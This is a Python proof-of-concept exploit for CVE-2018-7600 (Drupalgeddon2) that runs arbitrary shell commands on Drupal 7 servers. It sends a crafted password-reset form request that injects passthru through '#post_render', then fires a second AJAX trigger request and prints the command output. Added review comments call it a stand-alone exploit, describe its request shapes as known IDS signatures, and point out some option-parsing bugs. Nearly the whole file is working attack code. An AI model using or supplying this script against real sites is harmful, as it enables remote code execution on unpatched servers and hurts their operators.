"""Proof-of-concept for CVE-2018-7600 (Drupalgeddon2) against Drupal 7.

NOTE(review): this is a stand-alone exploit script, not defensive tooling.
The issue was fixed upstream (Drupal advisory SA-CORE-2018-002); the two
request shapes built from ``URL`` and ``SECOND_URL`` below are well-known
IDS/WAF signatures for this CVE and are what a defender should look for in
web-server and proxy logs.
"""
import sys
import requests
import getopt
from bs4 import BeautifulSoup

# Query-string fragment for the first request; main() appends the command to it.
URL = '?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]='
# POST body sent with the first request.
PAYLOAD = {'form_id':'user_pass', '_triggering_element_name':'name'}
# Query-string fragment for the second request; main() appends the
# form_build_id scraped from the first response.
SECOND_URL = "?q=file/ajax/name/%23value/"
# Port used when -p/--port is not given.
DEFAULT_PORT = 80


def usage() -> None:
    """Print the command-line help text to stdout."""
    print("CVE-2018-7600 Remote Code Execution in drupal 7")
    print()
    print("Flags:")
    print("{} - Target url".format("\t-t --target".ljust(20," ")))
    print("{} - Port of webserver".format("\t-p --port".ljust(20," ")))
    print("{} - Command to be executed".format("\t-c --command".ljust(20," ")))
    print()


def main() -> None:
    """Parse the command line, send both requests and print the response excerpt.

    Exits with status 1 on a usage error, a bad port, a missing target or
    command, or when the first response cannot be parsed.  Returns None.
    """
    if len(sys.argv) > 1:
        try:
            # NOTE(review): the long options are declared without a trailing
            # "=", so getopt treats them as taking no argument; only the
            # short forms -t/-p/-c behave as usage() describes.
            opts,args = getopt.getopt(sys.argv[1:],"t:p:c:",["target","port","command"])
        except getopt.GetoptError as e:
            print(str(e))
            usage()
            sys.exit(1)
        target = None
        command = None
        port = DEFAULT_PORT
        for o,a in opts:
            if o in ("-t","--target"):
                target = a
            # NOTE(review): "--comand" here does not match the "command"
            # long option registered above or the name shown by usage().
            elif o in ("-c","--comand"):
                command = a
            elif o in ("-p","--port"):
                try:
                    port = int(a)
                except ValueError:
                    print("[!] Invalid port provided, must be an int")
                    sys.exit(1)
            else:
                print("[!] Invalid option {}".format(o))
    else:
        print("[!] Must provide target url and command")
        sys.exit(1)
    # `quit` shadows the builtin of the same name; it is only a local flag here.
    quit = False
    if target is None:
        print("[!] Must provide target with -t or --target")
        quit = True
    if command is None:
        print("[!] Must provide command with -c or --command")
        quit = True
    if quit:
        sys.exit(1)
    print("[+] Sending command exploit")
    # First request: plain HTTP, no timeout is set on the call.
    r = requests.post("http://{}:{}{}{}".format(target, port, URL, command), data=PAYLOAD)
    soup = BeautifulSoup(r.text, "html.parser")
    try:
        print("[+] Prepping trigger")
        # Scrape form_build_id from the password-reset form in the first response.
        target_form = soup.find('form', {'id':'user-pass'})
        form_build_id = target_form.find('input', {'name':'form_build_id'}).get('value')
        second_payload = {'form_build_id':form_build_id}
        print("[+] Sending trigger")
        trigger = requests.post("http://{}:{}{}{}".format(target, port, SECOND_URL, form_build_id), data=second_payload)
        # Everything before Drupal's AJAX "settings" command is treated as the result.
        result = trigger.text.split('[{"command":"settings"')[0]
        print("[+] Result: {}".format(result))
    # NOTE(review): bare except masks the real cause (e.g. AttributeError when
    # the form is absent, connection errors, KeyboardInterrupt) behind one
    # generic message.
    except:
        print("[!] Error in html parsing")
        sys.exit(1)


if __name__ == '__main__':
    main()